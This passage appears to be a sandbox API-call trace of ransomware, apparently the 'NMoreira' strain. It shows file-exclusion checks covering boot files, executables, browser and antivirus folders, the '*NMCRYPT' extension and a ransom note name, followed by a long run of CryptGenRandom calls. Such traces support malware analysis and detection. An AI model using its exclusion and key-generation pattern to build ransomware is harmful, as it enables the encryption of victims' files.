(pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*bootmgr*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*boot*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*boot*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*CONFIG.SYS*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*IO.SYS*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*MSDOS.SYS*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*NTDETECT.COM*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*ntldr*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*chrome*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*opera*") returned 0 [0158.508] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", pszSpec="*firefox*") returned 0 [0158.509] wcslen (_String="\\\\?\\") returned 0x4 [0158.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad738 [0158.509] wcscmp (_String1=".", _String2=".") returned 0 [0158.509] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.509] wcscmp (_String1="..", _String2=".") returned 1 [0158.509] wcscmp (_String1="..", _String2="..") returned 0 [0158.509] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*NMCRYPT") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*Recovers your files.html") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.exe") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.dll") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.lnk") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.bat") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.ini") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.msi") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*.scf") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*pagefile.sys*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*AppData*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\winrar\\*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\java\\*") returned 0 [0158.509] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\windows\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\ESET\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\AVG\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*Atheros*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*Realtek*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*bootmgr*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*boot*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*boot*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*IO.SYS*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*ntldr*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*chrome*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*opera*") returned 0 [0158.510] PathMatchSpecW (pszFile="oskpredbase.xml", pszSpec="*firefox*") returned 0 [0158.510] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", pszSpec="*") returned 1 [0158.510] strlen (_Str="NMoreira") returned 0x8 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.510] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.511] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.512] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.513] CryptGenRandom (in: 